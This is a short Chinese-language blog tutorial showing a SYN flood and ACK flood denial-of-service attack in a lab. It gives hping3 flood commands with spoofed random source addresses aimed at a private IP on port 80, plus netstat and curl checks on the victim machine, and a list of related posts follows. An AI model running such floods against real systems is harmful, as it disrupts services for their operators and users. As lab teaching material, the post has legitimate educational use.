DDOS直接攻击系统资源

0。0;2023-10-24 1:08

DDOS ------直接攻击系统资源

思路:

攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2

(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

bash 复制代码 
hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察

(1)输入netstat -ant,可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com

发现系统资源被挤占,久久得不到回复。

相关推荐
goyeer1 分钟前
【ITIL4】34服务实践 - 发布管理
运维·企业数字化·信息化·it管理·itil·it治理
小王C语言3 分钟前
xshell免密登录
linux·运维·服务器
model20052 小时前
虚拟环境安装yolo26
linux·运维·服务器
Cat_Rocky2 小时前
keepalived简单配置
linux·运维·服务器
开开心心就好2 小时前
一键扫描电脑重复文件的实用工具
linux·运维·服务器·随机森林·智能手机·excel·启发式算法
b55t4ck2 小时前
Draytek vigo3910 工业路由器固件解密及其CVE-2024-23721漏洞分析
网络·物联网·网络安全
2301_816374332 小时前
Nginx下构建PC站点
java·运维·nginx
Run_Teenage2 小时前
Linux:线程互斥,线程锁
运维·开发语言·jvm
DigitalOcean3 小时前
DigitalOcean VPC 网络故障排查 Runbook 实战指南
运维·服务器
嵌入式×边缘AI:打怪升级日志3 小时前
Tina SDK Linux Kernel 基本使用(实战篇:为开发板添加用户按键驱动支持)
linux·运维·服务器
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04零基础教你claude code 接入 deepseek V405Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南06CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南09【AI】2026 年具身智能模型和世界模型总结102026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析